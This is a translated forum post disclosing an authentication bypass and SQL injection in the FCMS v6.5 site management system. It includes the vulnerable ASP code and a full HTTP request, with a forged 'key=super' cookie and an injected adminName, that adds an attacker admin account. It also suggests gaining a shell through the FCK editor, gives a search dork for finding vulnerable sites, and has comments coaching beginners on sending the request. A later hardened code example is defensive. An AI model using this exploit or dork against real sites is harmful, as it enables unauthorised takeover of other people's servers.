追梦Flash网站管理系统 FCMS v6.5 vulnerability

Author: roker
xmlEditor/adminadd.asp
[php]
<%
' adminadd.asp: the only gate is a client-supplied cookie "key" equal to "super"
if request.cookies("key")<>"super" then
response.Write("")  ' the message text inside the original string was lost in extraction
Response.End
end if
%>
[/php]
chkuser.asp
[php]
<%
' chkuser.asp: the adminName cookie is concatenated straight into the SQL string
set urs=server.createobject("adodb.recordset")
sql="select * from xmlAdmin where adminName='"&Request.cookies("adminName")&"'"
urs.open sql,conn,1,3
if urs.bof or urs.eof then
response.redirect "login.asp"
response.end
end if
urs.close
set urs=nothing
%>
[/php]
Submit the following request:
[php]
Host: xxx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2) Gecko/20100115 Firefox/3.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://xxx/xmlEditor/adminadd.asp
Cookie: key=super;adminName='%09or '1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

adminName=90sec&OSKEY=videos&newPwd=90sec&newPwd2=90sec&fullname=90sec&email=90sec%40qq.com[/php]
This adds a user whose account name and password are both 90sec = =
Once in the backend, the FCK editor can be used to get a shell.
Search keyword:
inurl:"server.asp?flowNo="
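For contrast, a hardened version of both checks, written here as an added example rather than code from FCMS: the admin identity comes from a server-side session set at login instead of a client-controlled cookie, and the lookup uses an ADODB.Command parameter so the value is never spliced into the SQL string. The `conn` object and the `xmlAdmin` table are taken from the page; `Session("adminName")` being set by login.asp is an assumption.

```asp
<%
' Hardened chkuser.asp (added example, not FCMS code).
' 1. Identity comes from the server-side Session populated by login.asp
'    (assumption), not from Request.Cookies, which the client controls.
' 2. The lookup is parameterised, so a value such as '<tab>or '1 is
'    compared literally instead of changing the query.
Dim adminName, cmd, urs
adminName = Session("adminName")
If IsEmpty(adminName) Or Len(adminName) = 0 Then
    Response.Redirect "login.asp"
    Response.End
End If

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn        ' conn is opened elsewhere, as on the page
cmd.CommandType = 1                    ' adCmdText
cmd.CommandText = "SELECT adminName FROM xmlAdmin WHERE adminName = ?"
' CreateParameter(name, type, direction, size, value):
' adVarChar = 200, adParamInput = 1, size 50 is an assumed column width
cmd.Parameters.Append cmd.CreateParameter("adminName", 200, 1, 50, adminName)
Set urs = cmd.Execute

If urs.BOF Or urs.EOF Then
    urs.Close
    Response.Redirect "login.asp"
    Response.End
End If
urs.Close
Set urs = Nothing
Set cmd = Nothing

' adminadd.asp should include this file and gate on the same session,
' not on Request.Cookies("key") = "super".
%>
```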

6 comments

  1. 小菜鸟

    Could you explain how to submit it?

    1. 0day5
      @小菜鸟

      You can use the all-powerful Burp to capture and submit the request, or use HttpLive to capture and submit it. What do you think, commenter #2?

      1. 小二
        @0day5

        Could you explain the submission in more detail? I've spent ages on it and still don't get it. :?:

        1. 0day5
          @小二

          Capture the request and submit it with
          adminName=90sec&OSKEY=videos&newPwd=90sec&newPwd2=90sec&fullname=90sec&email=90sec%40qq.com

      2. 小菜鸟
        @0day5

        Thank you, teacher!

        1. 0day5
          @小菜鸟

          Heh, we're all newbies, let's improve together
